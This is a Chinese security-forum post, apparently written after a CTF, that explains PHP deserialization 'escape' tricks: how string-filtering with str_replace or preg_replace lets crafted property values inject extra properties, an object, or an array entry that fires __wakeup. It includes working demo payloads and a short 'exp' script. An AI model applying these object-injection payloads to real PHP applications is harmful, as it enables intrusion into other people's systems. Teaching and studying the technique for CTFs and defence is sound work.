安全矩阵

 找回密码
 立即注册
搜索
查看: 1969|回复: 0

php反序列化逃逸

[复制链接]

855

主题

862

帖子

2940

积分

金牌会员

Rank: 6Rank: 6

积分
2940
发表于 2021-8-4 09:16:54 | 显示全部楼层 |阅读模式
本帖最后由 Delina 于 2021-8-4 09:21 编辑

原文链接:php反序列化逃逸
                                                                                                   
最近在打一个ctf的时候,接触到php反序列化逃逸。
这个知识点挺有意思的
首先序列化字符串各个字符的含义

  1. 类型    结构
  2. String    s:size:value;
  3. Integer    i:value;
  4. Boolean    b:value;(1或0)
  5. Null    N;
  6. Array    a:size:{key definition;value definition;(repeated per element)}
  7. Object    O:strlen(object name):object name:object size:{s:strlen(property name):property name:property definition;(repeated per property)}

  8. 例如:O:4:"user":2:{s:3:"age";i:18;s:4:"name";s:3:"LEO";}
  9. O代表对象;4代表对象名长度;2代表2个成员变量;
复制代码


先来看一段正常的php代码
知识点一-反序列化分隔符
反序列化以;}结束,后面的字符串不影响正常的反序列化
  1. <?php

  2. class A
  3. {
  4.     public $v1 = "a";
  5. }

  6. //正常序列化
  7. echo serialize(new A());
  8. // O:1:"A":1:{s:2:"v1";s:1:"a";}


  9. //反序列化以;}结束,后面的字符串不影响正常的反序列化
  10. $b = unserialize('O:1:"A":1:{s:2:"v1";s:1:"a";}dasdasdasdasdasdsa');
  11. var_dump($b);
  12. /*object(A)#1 (1) {
  13. ["v1"]=>
  14.   string(1) "a"
  15. }*/
复制代码

知识点二-属性逃逸
一般在数据先经过一次serialize再经过unserialize,在这个中间反序列化的字符串变多或者变少的时候才有可能存在逃逸
文字比较绕,看代码

  1. <?php

  2. class A
  3. {
  4.     public $v1 = "abcsystem()";
  5.     public $v2 = "123";
  6. }

  7. $data =  serialize(new A());
  8. //O:1:"A":2:{s:2:"v1";s:1:"a";s:2:"v2";s:1:"b";}

  9. $data = str_replace("system()","",$data);
  10. //echo $data;
  11. //O:1:"A":2:{s:2:"v1";s:11:"abc";s:2:"v2";s:3:"123";}
  12. //这个地方 s:11,代表属性有11个字符串,但是实际上经过过滤以后只剩下abc三个字符串了,这里就存在php反序列化逃逸的问题


  13. class B
  14. {
  15.     public $v1 = "abcsystem()system()system()";
  16.     public $v2 = '1234567";s:2:"v3";s:1:"a";};';
  17. }

  18. $data =  serialize(new B());
  19. $data = str_replace("system()","",$data);
  20. echo $data."\n";
  21. var_dump(unserialize($data));
  22. /*O:1:"B":2:{s:2:"v1";s:27:"abc";s:2:"v2";s:28:"1234567";s:2:"v3";s:1:"a";};";}
  23. object(B)#1 (3) {
  24.   ["v1"]=>
  25.   string(27) "abc";s:2:"v2";s:28:"1234567"
  26.   ["v2"]=>
  27.   string(28) "1234567";s:2:"v3";s:1:"a";};"
  28. ["v3"]=>
  29.   string(1) "a"
  30. }*/


复制代码


成功逃逸出v3属性
知识点三-object逃逸
看代码
  1. <?php

  2. //object 反序列化逃逸
  3. class A
  4. {
  5.     public $v1 = "systemsystemsystem123456";
  6.     public $v2 = '1";s:2:"v3";O:1:"C":1:{s:1:"a";s:3:"123";}}';    // 准备逃逸的字符
  7. }

  8. class C{
  9.     public $a = "1";
  10. }

  11. $a = new A();
  12. $data = serialize($a);

  13. $data = str_replace("system", "", $data);
  14. echo $data."\n";
  15. var_dump(unserialize($data));
  16. /*O:1:"A":2:{s:2:"v1";s:24:"123456";s:2:"v2";s:43:"1";s:2:"v3";O:1:"C":1:{s:1:"a";s:3:"123";}}";}
  17. object(A)#2 (3) {
  18.   ["v1"]=>
  19.   string(24) "123456";s:2:"v2";s:43:"1"
  20.   ["v2"]=>
  21.   string(43) "1";s:2:"v3";O:1:"C":1:{s:1:"a";s:3:"123";}}"
  22. ["v3"]=>
  23.   object(C)#3 (1) {
  24.   ["a"]=>
  25.     string(3) "123"
  26.   }
  27. }*/
复制代码




知识点四-数组逃逸
以碰到的ctf题目来进行讲解
题目化简后如下

  1. <?php

  2. class A
  3. {
  4.     public function __wakeup()
  5.     {
  6.         echo "flag";
  7.     }
  8. }

  9. $post = $_POST;
  10. $data = serialize($post);
  11. $serialize_data=  preg_replace('/s:/', 'S:', $data) . "\n";
  12. unserialize($serialize_data);
复制代码


这里会把反序列化字符串中的s替换成S,然后你会发现并没有什么异常,一样可以正常反序列化。
实际上是不一样的
小s,反序列化字符串
s:1:"a";s:3:"123";
大S,反序列化字符串中的值可以用十六进制进行表示
s:1:"a";S:1:"/00";
我们在输入的输入中,传输/00字符串,在经过程序过滤以后会将这种字符串看成一个字符串从而造成了反序列化逃逸
另外要注意一下数组反序列化的格式和object的格式有点不一样
Array a:size:{key definition;value definition;(repeated per element)}
exp

  1. <?php

  2. class A
  3. {
  4.     public function __wakeup()
  5.     {
  6.         echo "flag";
  7.     }
  8. }

  9. $post = $_POST;
  10. $data = serialize($post);
  11. $serialize_data=  preg_replace('/s:/', 'S:', $data) . "\n";
  12. unserialize($serialize_data);

  13. //$a = new A();
  14. //echo serialize($a);
  15. //exit();

  16. $post = array("a" => '\00\00\00\00\00\00\00',
  17.     'S:1:"a";S:1:"a";O:1:"A":0:{}}' => '',
  18. );

  19. $serialize_data = serialize($post);
  20. echo $serialize_data . "\n";;
  21. //a:2:{s:1:"a";s:21:"\00\00\00\00\00\00\00";s:29:"S:1:"a";S:1:"a";O:1:"A":0:{}}";s:0:"";}

  22. $serialize_data=  preg_replace('/s:/', 'S:', $serialize_data) . "\n";
  23. echo $serialize_data;
  24. //a:2:{S:1:"a";S:21:"\00\00\00\00\00\00\00";S:29:"S:1:"a";S:1:"a";O:1:"A":0:{}}";S:0:"";}

  25. $data = unserialize($serialize_data);
  26. var_dump($data);
  27. /*array(1) {
  28.     ["a"]=>
  29.   object(A)#1 (0) {
  30.   }
  31. }*/
复制代码


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 12:38 , Processed in 0.012550 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表